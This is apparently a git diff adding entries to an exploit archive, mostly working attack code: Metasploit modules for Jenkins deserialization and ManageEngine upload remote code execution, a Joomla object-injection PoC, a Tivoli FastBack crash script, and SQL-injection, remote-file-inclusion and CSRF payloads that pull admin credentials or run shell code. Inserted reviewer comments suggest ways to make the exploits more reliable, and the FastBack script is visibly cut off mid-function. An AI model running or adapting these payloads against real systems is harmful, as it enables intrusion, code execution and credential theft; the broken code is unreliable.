diff --git a/files.csv b/files.csv
index 780f67fb8..625d500cc 100755
--- a/files.csv
+++ b/files.csv
@@ -35232,3 +35232,15 @@ id,file,description,date,author,platform,type,port 38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,metasploit,multiple,remote,0 38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80 38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80 +38977,platforms/php/remote/38977.py,"Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,remote,0 +38978,platforms/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",windows,dos,11460 +38979,platforms/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460 +38980,platforms/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460 +38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 +38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020 +38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080 +38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 
+38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38988,platforms/php/webapps/38988.txt,"Dredge School Administration System /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion Vulnerabilities",2015-12-15,bd0rk,php,webapps,80 diff --git a/platforms/java/remote/38983.rb b/platforms/java/remote/38983.rb new file mode 100755 index 000000000..395094964 --- /dev/null +++ b/platforms/java/remote/38983.rb 
@@ -0,0 +1,263 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on + the Jenkins master, which allows remote arbitrary code execution. Authentication is not + required to exploit this vulnerability. + }, + 'Author' => + [ + 'Christopher Frohoff', # Vulnerability discovery + 'Steve Breen', # Public Exploit + 'Dev Mohanty', # Metasploit module + 'Louis Sato', # Metasploit + 'William Vu', # Metasploit + 'juan vazquez', # Metasploit + 'Wei Chen' # Metasploit + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-8103'], + ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'], + ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'], + ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'], + ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11'] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Jenkins 1.637', {} ] + ], + 'DisclosureDate' => 'Nov 18 2015', + 'DefaultTarget' => 0)) + + register_options([ + OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']), + OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), + Opt::RPORT('8080') + ], self.class) + end + + def exploit + unless vulnerable? 
+ fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") + end + invoke_remote_method(set_payload) + invoke_remote_method(class_load_payload) + end + + + # This is from the HttpClient mixin. But since this module isn't actually exploiting + # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion & + # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though. + + def target_uri + begin + # In case TARGETURI is empty, at least we default to '/' + u = datastore['TARGETURI'] + u = "/" if u.nil? or u.empty? + URI(u) + rescue ::URI::InvalidURIError + print_error "Invalid URI: #{datastore['TARGETURI'].inspect}" + raise Msf::OptionValidateError.new(['TARGETURI']) + end + end + + def normalize_uri(*strs) + new_str = strs * "/" + + new_str = new_str.gsub!("//", "/") while new_str.index("//") + + # Makes sure there's a starting slash + unless new_str[0,1] == '/' + new_str = '/' + new_str + end + + new_str + end + + def check + result = Exploit::CheckCode::Safe + + begin + if vulnerable? + result = Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + return Exploit::CheckCode::Unknown + end + + result + end + + def vulnerable? + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path) + }) + + unless res + fail_with(Failure::Unknown, 'The connection timed out.') + end + + http_headers = res.headers + + unless http_headers['X-Jenkins-CLI-Port'] + vprint_error('The server does not have the CLI port that is needed for exploitation.') + return false + end + + if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637 + @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i + return true + end + + false + end + + # Connects to the server, creates a request, sends the request, + # reads the response + # + # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi. 
+ # + def send_request_cgi(opts={}, timeout = 20) + if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 + actual_timeout = datastore['HttpClientTimeout'] + else + actual_timeout = opts[:timeout] || timeout + end + + begin + c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT']) + c.connect + r = c.request_cgi(opts) + c.send_recv(r, actual_timeout) + rescue ::Errno::EPIPE, ::Timeout::Error + nil + end + end + + def invoke_remote_method(serialized_java_stream) + begin + socket = connect(true, {'RPORT' => @jenkins_cli_port}) + + print_status 'Sending headers...' + socket.put(read_bin_file('serialized_jenkins_header')) + + vprint_status(socket.recv(1024)) + vprint_status(socket.recv(1024)) + + encoded_payload0 = read_bin_file('serialized_payload_header') + encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream) + encoded_payload2 = read_bin_file('serialized_payload_footer') + + encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}" + print_status "Sending payload length: #{encoded_payload.length}" + socket.put(encoded_payload) + ensure + disconnect(socket) + end + + end + + def print_status(msg='') + super("#{rhost}:#{rport} - #{msg}") + end + + # + # Serialized stream generated with: + # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java + # + def set_payload + stream = Rex::Java::Serialization::Model::Stream.new + + handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb') + decoded = stream.decode(handle) + handle.close + + inject_payload_into_stream(decoded).encode + end + + # + # Serialized stream generated with: + # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java + # + def class_load_payload + stream = Rex::Java::Serialization::Model::Stream.new + handle = File.new(File.join( 
Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb') + decoded = stream.decode(handle) + handle.close + inject_class_loader_into_stream(decoded).encode + end + + def inject_class_loader_into_stream(decoded) + file_name_utf8 = get_array_chain(decoded) + .values[2] + .class_data[0] + .values[1] + .values[0] + .values[0] + .class_data[3] + file_name_utf8.contents = get_random_file_name + file_name_utf8.length = file_name_utf8.contents.length + class_name_utf8 = get_array_chain(decoded) + .values[4] + .class_data[0] + .values[0] + class_name_utf8.contents = 'metasploit.Payload' + class_name_utf8.length = class_name_utf8.contents.length + decoded + end + + def get_random_file_name + @random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}" + end + + def inject_payload_into_stream(decoded) + byte_array = get_array_chain(decoded) + .values[2] + .class_data + .last + byte_array.values = payload.encoded.bytes + file_name_utf8 = decoded.references[44].class_data[0] + rnd_fname = get_random_file_name + register_file_for_cleanup(rnd_fname) + file_name_utf8.contents = rnd_fname + file_name_utf8.length = file_name_utf8.contents.length + decoded + end + + def get_array_chain(decoded) + object = decoded.contents[0] + lazy_map = object.class_data[1].class_data[0] + chained_transformer = lazy_map.class_data[0] + chained_transformer.class_data[0] + end + + def read_bin_file(bin_file_path) + data = '' + + File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f| + data = f.read + end + + data + end + +end \ No newline at end of file diff --git a/platforms/jsp/remote/38982.rb b/platforms/jsp/remote/38982.rb new file mode 100755 index 000000000..f9b2e5265 --- /dev/null +++ b/platforms/jsp/remote/38982.rb 
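Review bot: The version gate in `vulnerable?` (`http_headers['X-Jenkins'].to_f <= 1.637`) truncates a three-segment LTS version such as `1.625.2` to `1.625`, so a host on the LTS fix line named in the referenced advisory is still reported vulnerable and then attacked by `exploit`; compare with `Gem::Version.new(http_headers['X-Jenkins']) < Gem::Version.new('1.638')` and handle the 1.625.x branch explicitly instead of relying on float truncation. `send_request_cgi` also builds a `Rex::Proto::Http::Client`, calls `connect` and never closes it, so every `check` leaves a connection behind; wrap the request so that `c.close if c` runs in an `ensure`. The two bare `socket.recv(1024)` calls in `invoke_remote_method` have no timeout and will block indefinitely if the CLI port answers with a single short frame — a bounded read such as `socket.get_once(1024, 5)` is safer. Finally, the exploit drops a payload jar under `TEMP` and registers it for cleanup, but nothing in the description tells an operator that the stager writes to disk on the master; a one-line note in the module description would help incident responders.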
@@ -0,0 +1,212 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'nokogiri' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability", + 'Description' => %q{ + This module exploits a vulnerability found in ManageEngine Desktop Central 9. When + uploading a 7z file, the FileUploadServlet class does not check the user-controlled + ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to + inject a null bye at the end of the value to create a malicious file with an arbitrary + file type, and then place it under a directory that allows server-side scripts to run, + which results in remote code execution under the context of SYSTEM. + + Please note that by default, some ManageEngine Desktop Central versions run on port 8020, + but older ones run on port 8040. Also, using this exploit will leave debugging information + produced by FileUploadServlet in file rdslog0.txt. + + This exploit was successfully tested on version 9, build 90109 and build 91084. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'References' => + [ + [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ], + [ 'CVE', '2015-8249'] + ], + 'Platform' => 'win', + 'Targets' => + [ + [ 'ManageEngine Desktop Central 9 on Windows', {} ] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'Privileged' => false, + 'DisclosureDate' => "Dec 14 2015", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']), + Opt::RPORT(8020) + ], self.class) + end + + def jsp_drop_bin(bin_data, output_file) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| + + jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| + + jspraw << %Q|int numbytes = data.length();\n| + + jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| + jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| + jspraw << %Q|{\n| + jspraw << %Q| char char1 = (char) data.charAt(counter);\n| + jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| + jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| + jspraw << %Q| comb <<= 4;\n| + jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| + jspraw << %Q| bytes[counter/2] = (byte)comb;\n| + jspraw << %Q|}\n| + + jspraw << %Q|outputstream.write(bytes);\n| + jspraw << %Q|outputstream.close();\n| + jspraw << %Q|%>\n| + + jspraw + end + + def jsp_execute_command(command) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|try {\n| + jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|} catch (IOException ioe) { }\n| + jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| + jspraw << %Q|%>\n| + + jspraw + end + + def 
get_jsp_stager + exe = generate_payload_exe(code: payload.encoded) + jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp" + # pwd: C:\ManageEngine\DesktopCentral_Server\bin + # targeted location: C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf + register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}") + + { + jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname), + jsp_name: jsp_fname + } + end + + def get_build_number(res) + inputs = res.get_hidden_inputs + # The buildNum input is in the first form + inputs.first['buildNum'] + end + + def get_html_title(res) + html = res.body + n = ::Nokogiri::HTML(html) + n.at_xpath('//title').text + end + + def check + uri = normalize_uri(target_uri.path, '/configurations.do') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + unless res + vprint_error("Connection timed out") + return Exploit::CheckCode::Unknown + end + + build_number = get_build_number(res) + vprint_status("Found build number: #{build_number}") + + html_title = get_html_title(res) + vprint_status("Found title: #{html_title}") + + if build_number <= '91084' + return Exploit::CheckCode::Appears + elsif /ManageEngine Desktop Central/ === html_title + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def upload_jsp(stager_info) + # connectionId is part of the 7z filename + # computerName is part of the 7z filename (but will be used due to the null byte injection) + # customerId is used as a directory name + # + # The intended upload path is: + # C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\server-data\[customerId]\rds\scr-rec\null-computerName-connectionId.7z + # But this will upload to: + # C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf + + uri = normalize_uri(target_uri.path, 'fileupload') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'ctype' => 'application/octet-stream', + 'encode_params' => false, 
+ 'data' => stager_info[:jsp_payload], + 'vars_get' => { + 'connectionId' => "#{Rex::Text.rand_text_alpha(1)}/../../../../../jspf/#{stager_info[:jsp_name]}%00", + 'resourceId' => Rex::Text.rand_text_alpha(1), + 'action' => 'rds_file_upload', + 'computerName' => Rex::Text.rand_text_alpha(rand(10)+5), + 'customerId' => Rex::Text.rand_text_numeric(rand(10)+5) + } + }) + + if res.nil? + fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}") + elsif res && res.code != 200 + fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.") + end + end + + def exec_jsp(stager_info) + uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + if res.nil? + fail_with(Failure::Unknown, "Connection timed out while executing #{uri}") + elsif res && res.code != 200 + fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}") + end + end + + def exploit + print_status("Creating JSP stager") + stager_info = get_jsp_stager + + print_status("Uploading JSP stager #{stager_info[:jsp_name]}...") + upload_jsp(stager_info) + + print_status("Executing stager...") + exec_jsp(stager_info) + end + +end diff --git a/platforms/php/remote/38977.py b/platforms/php/remote/38977.py new file mode 100755 index 000000000..ed3c04082 --- /dev/null +++ b/platforms/php/remote/38977.py 
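Review bot: `check` dereferences `inputs.first['buildNum']` in `get_build_number` with no guard for a page that has no hidden inputs, so a non-ManageEngine service on 8020 (or a redirect to a login page) raises `NoMethodError` on `nil` instead of returning `Safe`/`Unknown`; use `build_number = inputs.first && inputs.first['buildNum']` and `if build_number && build_number.to_i <= 91084`. The current `build_number <= '91084'` is also a lexicographic string compare that only works while build numbers keep the same digit count. The stager writes the EXE via `FileOutputStream("<name>.jsp")` relative to the server's working directory (`bin`, per the comment in `get_jsp_stager`), but only the JSP under `webapps/DesktopCentral/jspf` is registered for cleanup, so the dropped binary stays on disk after the session — either register it as well or call it out in the description next to the `rdslog0.txt` warning. The `chmod +x` exec in `jsp_execute_command` is a no-op on the Windows-only target and can be dropped.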
@@ -0,0 +1,44 @@ +''' + Simple PoC for Joomla Object Injection. + Gary @ Sec-1 ltd + http://www.sec-1.com/ +''' + +import requests # easy_install requests + +def get_url(url, user_agent): + + headers = { + 'User-Agent': user_agent + } + cookies = requests.get(url,headers=headers).cookies + for _ in range(3): + response = requests.get(url, headers=headers,cookies=cookies) + return response + +def php_str_noquotes(data): + "Convert string to chr(xx).chr(xx) for use in php" + encoded = "" + for char in data: + encoded += "chr({0}).".format(ord(char)) + + return encoded[:-1] + + +def generate_payload(php_payload): + + php_payload = "eval({0})".format(php_str_noquotes(php_payload)) + + terminate = '\xf0\xfd\xfd\xfd'; + exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' + injected_payload = "{};JFactory::getConfig();exit".format(php_payload) + exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) + exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate + + return exploit_template + + + +pl = generate_payload("system('touch /tmp/fx');") + +print get_url("http://172.31.6.242/", pl) \ No newline at end of file diff --git a/platforms/php/webapps/28564.txt b/platforms/php/webapps/28564.txt index 90cf84bbe..5d37a8b23 100755 --- a/platforms/php/webapps/28564.txt +++ b/platforms/php/webapps/28564.txt @@ -17,10 +17,6 @@ Cross Site Scripting http://site-target/search.php?s=[XSS] -Example - -http://www.freearticle.com.au/search.php?s= - #XSS at Page Admin 
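Review bot: `get_url` issues four `requests.get` calls with no `timeout`, so a target that accepts the connection and stalls blocks the PoC forever; pass `timeout=10` (or take it as a parameter). As I read the flow, the payload travels in `User-Agent` and is only triggered on the follow-up requests that replay the session cookie from the first response, yet the code never checks that `cookies` is non-empty, so against a host that sets no cookie the three follow-ups silently start fresh sessions and the single `print get_url(...)` gives no hint why nothing fired. Target URL and command are hard-coded (`http://172.31.6.242/`, `touch /tmp/fx`) — take them from `sys.argv` so the script is not a one-off. Note too that `print get_url(...)` is Python 2 syntax and `terminate` is a `str` of raw `\xf0\xfd\xfd\xfd` bytes, both of which break under Python 3; a `#!/usr/bin/env python2` line or a comment stating the interpreter would save the next user a confusing failure.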
@@ -36,18 +32,8 @@ http://site-target/search.php?s=[SQL Injection] Example -http://www.freearticle.com.au/feed.php?cat=100' -http://www.freearticle.com.au/search.php?s=123' +http://site-target/feed.php?cat=100' +http://site-target/search.php?s=123' ==================================================================================== -Example Target - -http://freearticle.com.au/feed.php?cat=100' -http://alfithrah99.net/artikel/feed.php?cat=2' -http://demos1.softaculous.com/ArticleSetup/feed.php?cat=100' -http://oromodictionary.com/articles/feed.php?cat=1' -http://beingshoppers.com/article/feed.php?cat=44' -http://acheon.eu/article/feed.php?cat=54' -http://sitevena.com/feed.php?cat=12' -http://www.articleshub.in/feed.php?cat=10' \ No newline at end of file diff --git a/platforms/php/webapps/38981.txt b/platforms/php/webapps/38981.txt new file mode 100755 index 000000000..9119922da --- /dev/null +++ b/platforms/php/webapps/38981.txt @@ -0,0 +1,26 @@ +# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability +# Author: bd0rk +# eMail: bd0rk[at]hackermail.com +# Tested on: Ubuntu-Linux +# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880 + + +Proof-of-Concept: + +/absences-2-64/programs/planning.php line 26 +--------------------------------------------------------------- + +require_once $GLOBALS['babInstallPath'].'utilit/defines.php'; + +--------------------------------------------------------------- + +[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt? + + +Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once. + So an attacker can use this to execute some php-shellcode for example. + + +### The 27 years old, german hacker bd0rk ### + + diff --git a/platforms/php/webapps/38985.txt b/platforms/php/webapps/38985.txt new file mode 100755 index 000000000..cdd9023e3 
--- /dev/null +++ b/platforms/php/webapps/38985.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/64720/info + +Dredge School Administration System is prone to the following security vulnerabilities: + +1. An SQL-injection vulnerability +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An information-disclosure vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions. + +Dredge School Administration System 1.0 is vulnerable; other versions may also be affected. + + +http://www.example.com/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff + +http://www.example.com/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff + +http://www.example.com/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff \ No newline at end of file diff --git a/platforms/php/webapps/38986.txt b/platforms/php/webapps/38986.txt new file mode 100755 index 000000000..348d4a32b --- /dev/null +++ b/platforms/php/webapps/38986.txt 
@@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/64720/info + +Dredge School Administration System is prone to the following security vulnerabilities: + +1. An SQL-injection vulnerability +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An information-disclosure vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions. + +Dredge School Administration System 1.0 is vulnerable; other versions may also be affected. + + +Iphobos Blog + + + diff --git a/platforms/php/webapps/38987.html b/platforms/php/webapps/38987.html new file mode 100755 index 000000000..0c00d8ee1 --- /dev/null +++ b/platforms/php/webapps/38987.html @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/64720/info + +Dredge School Administration System is prone to the following security vulnerabilities: + +1. An SQL-injection vulnerability +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An information-disclosure vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions. + +Dredge School Administration System 1.0 is vulnerable; other versions may also be affected. + +[Change Password & Email Admin] + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/38988.txt b/platforms/php/webapps/38988.txt new file mode 100755 index 000000000..d222fa117 --- /dev/null +++ b/platforms/php/webapps/38988.txt @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/64720/info + +Dredge School Administration System is prone to the following security vulnerabilities: + +1. An SQL-injection vulnerability +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An information-disclosure vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions. + +Dredge School Administration System 1.0 is vulnerable; other versions may also be affected. + +II. Backup Download + +############## +VULNERABILITY +############## + +/Backup/processbackup.php (LINE: 89-93) + +----------------------------------------------------------------------------- + //save file + // $handle = +fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+'); + $handle = fopen('RecordManager.sql','w+'); + fwrite($handle,$return); + fclose($handle); + +----------------------------------------------------------------------------- + +##################################################### +EXPLOIT +##################################################### + +1. Open http://www.example.com/DSM/Backup/processbackup.php +2. When you open the link produces RecordManager.sql +3. to download backup [http://www.example.com/DSM/Backup/RecordManager.sql] \ No newline at end of file diff --git a/platforms/php/webapps/38989.txt b/platforms/php/webapps/38989.txt new file mode 100755 index 000000000..f25f0bb7d --- /dev/null 
+++ b/platforms/php/webapps/38989.txt @@ -0,0 +1,42 @@ +# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities +# Author: bd0rk +# eMail: bd0rk[at]hackermail.com +# Twitter: twitter.com/bd0rk +# Tested on: Ubuntu-Linux +# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792 + +PoC1: + +/bulletindoc-2-9/programs/admin.php line 2 +------------------------------------------------------ + +include $babInstallPath."admin/acl.php"; + +------------------------------------------------------ + +[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode] + +Description: The $babInstallPath-parameter isn't declared before include. + So an attacker can execute evil-code 'bout this. + + + +PoC2: + +/bulletindoc-2-9/programs/main.php line 2 +------------------------------------------------------- + +require_once( $GLOBALS['babAddonPhpPath']."fonctions.php"); + +------------------------------------------------------- + +[+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE? + +Description: The problem is the same as the first. -.- + It's possible to compromise the system. + +### The 27 years old, german hacker bd0rk ### + +Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm + + diff --git a/platforms/windows/dos/38978.py b/platforms/windows/dos/38978.py new file mode 100755 index 000000000..9ddde76a7 --- /dev/null +++ b/platforms/windows/dos/38978.py 
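Review bot: Both PoCs depend on setting `$babInstallPath` / `$GLOBALS['babAddonPhpPath']` from the query string, which only works with `register_globals=On` (removed in PHP 5.4) and, for a remote URL payload, `allow_url_include=On`; the advisory should state these preconditions, because a default PHP 5.4+ install is not exploitable this way even though the undeclared-variable `include` is still a defect. `Sploit2` is also missing the closing bracket in `http://[s0me0ne/bulletindoc-2-9/programs/main.php?...`. Whether `programs/admin.php` and `programs/main.php` can be requested directly rather than only through Ovidentia's front controller is not shown here and is worth a sentence.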
@@ -0,0 +1,92 @@ +#!/usr/bin/python +# +################################################################################ +# +# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2 +# Invalid Pointer Dereference +# Date: 14 December 2015 +# Author: Gianni Gnesa (gnix) +# +# Vendor Homepage: http://www.ibm.com/ +# Software Name: IBM Tivoli Storage Manager FastBack +# Software Version: 5.5.4.2 (x86) +# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager +# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy" +# (Version 5.5.4.2, Size: 120.7 MB) +# +# Tested on: Windows 7 Professional (x86) +# +################################################################################ +# +# Crash: +# ====== +# +# (f60.654): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=41414141 ebx=01bf4fb8 ecx=41414141 edx=41414141 esi=01bf4fb8 edi=00000000 +# eip=0063d84a esp=01dce0c8 ebp=01dce0cc iopl=0 nv up ei pl nz na pe nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +# FastBackServer!CLocation::GetLocationParams+0xa: +# 0063d84a 8b4004 mov eax,dword ptr [eax+4] ds:0023:41414145=???????? +# +################################################################################ + +import sys +import time +import socket +from struct import pack + + +def create_pkt(opcode, p1="", p2="", p3=""): + + # psAgentCommand (0x30 bytes) + buf = "\x44" * 0xC + buf+= pack("i", len(buf)-4) + buf + + return buf + + +def main(): + if len(sys.argv) != 2: + print "Usage: %s \n" % sys.argv[0] + sys.exit(1) + + server = sys.argv[1] + port = 11460 + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((server, port)) + + pkt = create_pkt( opcode = 0x537, + p1 = "A" * 24000, + p2 = "B" * 24000, + p3 = "C" * 1000 ) + + s.send(pkt) + s.close() + + print "[+] Packet sent." 